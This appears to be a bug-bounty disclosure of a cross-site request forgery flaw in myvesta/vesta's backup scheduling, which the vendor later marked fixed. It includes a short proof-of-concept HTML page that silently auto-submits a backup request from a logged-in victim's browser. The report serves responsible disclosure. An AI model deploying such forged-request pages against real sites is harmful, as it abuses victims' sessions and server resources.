Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


✍️ Description

In this application there is weak CSRF protection on backup functionality. therefore according to below POC.html when a logged in user visits attacker website then an unintentional backup request sends to application.

πŸ•΅οΈβ€β™‚οΈ Proof of Concept

//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/schedule/backup/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

πŸ’₯ Impact

This vulnerability is capable of forging admin or user to an unintentional backup that can cause using server resource and Disc filling.

πŸ’₯ Test

Tested on Edge, Firefox, chrome and safari. πŸ“ Location index.php#L1 πŸ“ References csrf

Occurrences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back 2 years ago
Musio modified the report
2 years ago
myvesta validated this vulnerability 2 years ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta marked this as fixed with commit 11f1cf 2 years ago
myvesta has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation